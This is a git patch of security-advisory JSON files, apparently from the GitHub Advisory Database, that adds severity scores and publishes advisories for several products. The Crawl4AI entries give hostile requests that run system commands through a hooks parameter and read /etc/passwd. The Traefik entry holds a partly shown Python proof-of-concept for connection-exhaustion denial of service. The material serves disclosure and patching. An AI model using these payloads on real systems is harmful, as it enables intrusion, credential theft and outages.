a/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json +++ b/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rfv8-2g5x-rm48", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-68406" ], "details": "A path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json b/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json index 4ddd2c78d7f31..79e9f39b12d4e 100644 --- a/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json +++ b/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rghx-3352-87pf", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54170" ], "details": "An out-of-bounds read vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json b/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json index 70f9f515b4aca..0f8120f22758c 100644 --- a/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json +++ b/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v66c-4xgf-59c7", - "modified": "2026-02-11T18:31:30Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T18:31:29Z", "aliases": [ "CVE-2025-65128" ], "details": "A missing authentication mechanism in the web management API components of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows unauthenticated attackers on the local network to modify router and network configurations. By invoking operations whose names end with \"*_nocommit\" and supplying the parameters expected by the invoked function, an attacker can change configuration data, including SSID, Wi-Fi credentials, and administrative passwords, without authentication or an existing session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T18:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json b/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json index c1e24fe9d70a6..475e027ab876a 100644 --- a/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json +++ b/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-v99r-49f4-6c26", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-53598" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json b/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json index 4cd3d51203813..ac5a88b0aa191 100644 --- a/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json +++ b/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w65x-hpv6-vv6v", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T15:32:46Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2026-20610" ], "details": "This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json b/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json index 47aaaf830cc6f..41296480ce081 100644 --- a/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json +++ b/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w669-772h-5fh5", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54147" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json b/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json index 43ffb82003f0c..c62ba6d372f3b 100644 --- a/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json +++ b/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wj6w-x5qq-4qqw", - "modified": "2026-02-12T06:30:13Z", + "modified": "2026-02-12T15:32:47Z", "published": "2026-02-12T06:30:13Z", "aliases": [ "CVE-2025-14892" ], "details": "The Prime Listing Manager WordPress plugin through 1.1 allows an attacker to gain administrative access without having any kind of account on the targeted site and perform unauthorized actions due to a hardcoded secret.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T06:16:01Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wvx5-w592-wf52/GHSA-wvx5-w592-wf52.json b/advisories/unreviewed/2026/02/GHSA-wvx5-w592-wf52/GHSA-wvx5-w592-wf52.json new file mode 100644 index 0000000000000..d81a098f53daf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvx5-w592-wf52/GHSA-wvx5-w592-wf52.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvx5-w592-wf52", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-1320" + ], + "details": "The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' HTTP header in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1320" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449531/secure-copy-content-protection" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4dd681d-90cb-44dc-adf0-d7e269d15a60?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x5rj-w9pr-xhrg/GHSA-x5rj-w9pr-xhrg.json b/advisories/unreviewed/2026/02/GHSA-x5rj-w9pr-xhrg/GHSA-x5rj-w9pr-xhrg.json new file mode 100644 index 0000000000000..6b4fc03b0e7f9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x5rj-w9pr-xhrg/GHSA-x5rj-w9pr-xhrg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5rj-w9pr-xhrg", + "modified": "2026-02-12T15:32:47Z", + "published": "2026-02-12T15:32:47Z", + "aliases": [ + "CVE-2026-1316" + ], + "details": "The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'media[].href' parameter in all versions up to, and including, 5.97.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers (if 'Enable for Guests' is enabled) to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1316" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3446777/customer-reviews-woocommerce" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8b34144-5516-46df-b093-95f4bf76b896?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T13:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x64q-5pj8-ccxv/GHSA-x64q-5pj8-ccxv.json b/advisories/unreviewed/2026/02/GHSA-x64q-5pj8-ccxv/GHSA-x64q-5pj8-ccxv.json new file mode 100644 index 0000000000000..e85af2c3d1d53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x64q-5pj8-ccxv/GHSA-x64q-5pj8-ccxv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x64q-5pj8-ccxv", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-1104" + ], + "details": "The FastDup – Fastest WordPress Migration & Duplicator plugin for WordPress is vulnerable to unauthorized backup creation and download due to a missing capability check on REST API endpoints in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to create and download full-site backup archives containing the entire WordPress installation, including database exports and configuration files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/fastdup/trunk/includes/Endpoint/PackageApi.php#L371" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449530" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29c0fb4d-c38c-4c78-9e15-797f3c3a4b30?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T15:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json b/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json index 2379d6504f354..76c43cf9b047c 100644 --- a/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json +++ b/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xp29-43pm-7r9g", - "modified": "2026-02-12T12:31:00Z", + "modified": "2026-02-12T15:32:47Z", "published": "2026-02-12T12:31:00Z", "aliases": [ "CVE-2025-15573" ], "details": "The affected devices do not validate the server certificate when connecting to the SolaX Cloud MQTTS server hosted in the Alibaba Cloud (mqtt001.solaxcloud.com, TCP 8883). This allows attackers in a man-in-the-middle position to act as the legitimate MQTT server and issue arbitrary commands to devices.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-295" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T11:15:47Z" From 432739ca494b83ee2280b5adcc66f724058ba839 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 15:45:36 +0000 Subject: [PATCH 035/215] Publish Advisories GHSA-m2ch-x2q7-2284 GHSA-m2ch-x2q7-2284 --- .../GHSA-m2ch-x2q7-2284.json | 65 +++++++++++++++++++ .../GHSA-m2ch-x2q7-2284.json | 29 --------- 2 files changed, 65 insertions(+), 29 deletions(-) create mode 100644 advisories/github-reviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json delete mode 100644 advisories/unreviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json diff --git a/advisories/github-reviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json b/advisories/github-reviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json new file mode 100644 index 0000000000000..98bbe8382ac18 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m2ch-x2q7-2284", + "modified": "2026-02-12T15:43:41Z", + "published": "2022-05-24T17:21:07Z", + "aliases": [ + "CVE-2017-18912" + ], + "summary": "Mattermost Server allows an attacker to specify a full pathname of a log file", + "details": "An issue was discovered in Mattermost Server before 3.7.5. It allows an attacker to specify a full pathname of a log file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.7.4-0.20170404171331-0b5c0794fdcb" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18912" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/0b5c0794fdcbb551c1233dcdfbdf5c7deb585fd6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:43:41Z", + "nvd_published_at": "2020-06-19T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json b/advisories/unreviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json deleted file mode 100644 index 2fc42729c4276..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json +++ /dev/null @@ -1,29 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m2ch-x2q7-2284", - "modified": "2022-05-24T17:21:07Z", - "published": "2022-05-24T17:21:07Z", - "aliases": [ - "CVE-2017-18912" - ], - "details": "An issue was discovered in Mattermost Server before 3.8.2, 3.7.5, and 3.6.7. It allows an attacker to specify a full pathname of a log file.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18912" - }, - { - "type": "WEB", - "url": "https://mattermost.com/security-updates" - } - ], - "database_specific": { - "cwe_ids": [], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-06-19T19:15:00Z" - } -} \ No newline at end of file From 55e844c9143ece8641ce8b29a225ec4e4e6455af Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 15:54:47 +0000 Subject: [PATCH 036/215] Publish Advisories GHSA-5882-5rx9-xgxp GHSA-vx9w-5cx4-9796 GHSA-89p3-4642-cr2w --- .../GHSA-5882-5rx9-xgxp.json | 6 +- .../GHSA-vx9w-5cx4-9796.json | 6 +- .../GHSA-89p3-4642-cr2w.json | 64 +++++++++++++++++++ 3 files changed, 72 insertions(+), 4 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json diff --git a/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json b/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json index babdef9374e1c..0a604006f7da5 100644 --- a/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json +++ b/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-5882-5rx9-xgxp", - "modified": "2026-01-16T20:59:16Z", + "modified": "2026-02-12T15:52:46Z", "published": "2026-01-16T20:59:16Z", - "aliases": [], + "aliases": [ + "CVE-2026-26216" + ], "summary": "Crawl4AI is Vulnerable to Remote Code Execution in Docker API via Hooks Parameter", "details": "A critical remote code execution vulnerability exists in the Crawl4AI Docker API deployment. The `/crawl` endpoint accepts a `hooks` parameter containing Python code that is executed using `exec()`. The `__import__` builtin was included in the allowed builtins, allowing attackers to import arbitrary modules and execute system commands.\n\n**Attack Vector:**\n```json\nPOST /crawl\n{\n \"urls\": [\"https://example.com\"],\n \"hooks\": {\n \"code\": {\n \"on_page_context_created\": \"async def hook(page, context, **kwargs):\\n __import__('os').system('malicious_command')\\n return page\"\n }\n }\n}\n```\n\n### Impact\n\nAn unauthenticated attacker can:\n- Execute arbitrary system commands\n- Read/write files on the server\n- Exfiltrate sensitive data (environment variables, API keys)\n- Pivot to internal network services\n- Completely compromise the server\n\n### Mitigation\n\n1. **Upgrade to v0.8.0** (recommended)\n2. If unable to upgrade immediately:\n - Disable the Docker API\n - Block `/crawl` endpoint at network level\n - Add authentication to the API\n\n### Fix Details\n\n1. Removed `__import__` from `allowed_builtins` in `hook_manager.py`\n2. Hooks disabled by default (`CRAWL4AI_HOOKS_ENABLED=false`)\n3. Users must explicitly opt-in to enable hooks\n\n### Credits\n\nDiscovered by Neo by ProjectDiscovery (https://projectdiscovery.io)", "severity": [ diff --git a/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json b/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json index 6cccdc7d5d4e3..3241e6fcbce22 100644 --- a/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json +++ b/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-vx9w-5cx4-9796", - "modified": "2026-01-16T20:59:08Z", + "modified": "2026-02-12T15:53:27Z", "published": "2026-01-16T20:58:51Z", - "aliases": [], + "aliases": [ + "CVE-2026-26217" + ], "summary": "Crawl4AI Has Local File Inclusion in Docker API via file:// URLs", "details": "A local file inclusion vulnerability exists in the Crawl4AI Docker API. The /execute_js, /screenshot, /pdf, and /html endpoints accept file:// URLs, allowing attackers to read arbitrary files from the server filesystem.\n\nAttack Vector:\n```json\nPOST /execute_js\n{\n \"url\": \"file:///etc/passwd\",\n \"scripts\": [\"document.body.innerText\"]\n}\n```\nImpact\n\nAn unauthenticated attacker can:\n- Read sensitive files (/etc/passwd, /etc/shadow, application configs)\n- Access environment variables via /proc/self/environ\n- Discover internal application structure\n- Potentially read credentials and API keys\n\nWorkarounds\n\n1. Disable the Docker API\n2. Add authentication to the API\n3. Use network-level filtering", "severity": [ diff --git a/advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json b/advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json new file mode 100644 index 0000000000000..60b66f790119c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89p3-4642-cr2w", + "modified": "2026-02-12T15:54:11Z", + "published": "2026-02-12T15:54:11Z", + "aliases": [ + "CVE-2026-25949" + ], + "summary": "Traefik: TCP readTimeout bypass via STARTTLS on Postgres", + "details": "## Impact\n\nThere is a potential vulnerability in Traefik managing STARTTLS requests. \n\nAn unauthenticated client can bypass Traefik entrypoint `respondingTimeouts.readTimeout` by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. \n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v3.6.8\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n
\nOriginal Description\n\n### Summary\nA remote, unauthenticated client can bypass Traefik entrypoint `respondingTimeouts.readTimeout` by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely and enabling file-descriptor and goroutine exhaustion denial of service.\n\nThis triggers during protocol detection **before routing**, so it is reachable on an entrypoint even when **no Postgres/TCP routers are configured** (the PoC uses only an HTTP router).\n\n### Details\nTraefik applies per-connection deadlines based on `entryPoints..transport.respondingTimeouts.readTimeout` to prevent protocol detection and request reads from blocking forever (see `pkg/server/server_entrypoint_tcp.go`, which sets `SetReadDeadline` on accepted connections).\n\nHowever, in the TCP router protocol detection path (`pkg/server/router/tcp/router.go`), when Traefik detects the Postgres STARTTLS signature on a new connection, it executes a fast-path that clears deadlines:\n\n- detect Postgres SSLRequest (8-byte signature),\n- call `conn.SetDeadline(time.Time{})` (clears all deadlines),\n- then enter the Postgres STARTTLS handler (`servePostgres`).\n\nThe Postgres handler (`pkg/server/router/tcp/postgres.go`) then blocks waiting for a TLS ClientHello via the same peeking logic used elsewhere (`clientHelloInfo(br)`), but with deadlines removed. An attacker can therefore:\n\n1. connect to any internet-exposed TCP entrypoint,\n2. send the Postgres SSLRequest (SSL negotiation request),\n3. receive Traefik’s single-byte response (`S`),\n4. stop sending any further bytes.\n\n\nEach such connection remains open past the configured `readTimeout` (indefinitely), consuming a goroutine and a file descriptor until Traefik hits process limits.\n\n_Of note_: CVE-2026-22045 fixed a conceptually-similar DoS where a protocol-specific fast path cleared connection deadlines and then could block in TLS handshake processing, allowing unauthenticated clients to tie up goroutines/FDs indefinitely. This report is the same failure mode, but triggered via the Postgres STARTTLS detection path.\n\nTested versions:\n- `v3.6.7`\n- `master` at commit `a4a91344edcdd6276c1b766ca19ee3f0e346480f` \n\n### PoC\nPrerequisites:\n- Linux host\n- Python 3\n- A prebuilt Traefik `v3.6.7` binary. The script below expects the path in the script’s `TRAEFIK_BIN` constant (edit if needed).\n\nExecute the script below:\n
\nScript (Click to expand)\n\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport os\nimport socket\nimport subprocess\nimport tempfile\nimport time\nfrom typing import Final\n\n# Hardcode the Traefik binary path. Edit as needed.\nTRAEFIK_BIN: Final[str] = \"/usr/local/sbin/traefik\"\n\nHOST: Final[str] = \"127.0.0.1\"\nPORT: Final[int] = 18080\n\nSTARTUP_SLEEP_SECS: Final[float] = 2.0\nREAD_TIMEOUT_SECS: Final[float] = 2.0\nSLEEP_SECS: Final[float] = 3.5\nN_CONNS: Final[int] = 300\n\nPOSTGRES_SSLREQUEST: Final[bytes] = bytes([0x00, 0x00, 0x00, 0x08, 0x04, 0xD2, 0x16, 0x2F])\n\n\ndef fd_count(pid: int) -> int:\n return len(os.listdir(f\"/proc/{pid}/fd\"))\n\n\ndef open_idle_conns(n: int) -> list[socket.socket]:\n conns: list[socket.socket] = []\n for _ in range(n):\n conns.append(socket.create_connection((HOST, PORT)))\n return conns\n\n\ndef open_postgres_sslrequest_conns(n: int) -> list[socket.socket]:\n conns: list[socket.socket] = []\n for _ in range(n):\n s = socket.create_connection((HOST, PORT))\n s.settimeout(1.0)\n s.sendall(POSTGRES_SSLREQUEST)\n try:\n _ = s.recv(1) # typically b\"S\"\n except socket.timeout:\n pass\n conns.append(s)\n return conns\n\n\ndef close_all(conns: list[socket.socket]) -> None:\n for s in conns:\n try:\n s.close()\n except OSError:\n pass\n\n\ndef main() -> None:\n with tempfile.TemporaryDirectory(prefix=\"vh-traefik-f005-\") as td:\n dyn = os.path.join(td, \"dynamic.yml\")\n with open(dyn, \"w\", encoding=\"utf-8\") as f:\n f.write(\n f\"\"\"\\\nhttp:\n routers:\n r:\n entryPoints: [web]\n rule: \"PathPrefix(`/`)\"\n service: s\n services:\n s:\n loadBalancer:\n servers:\n - url: \"http://{HOST}:9\"\n\"\"\"\n )\n\n proc = subprocess.Popen(\n [\n 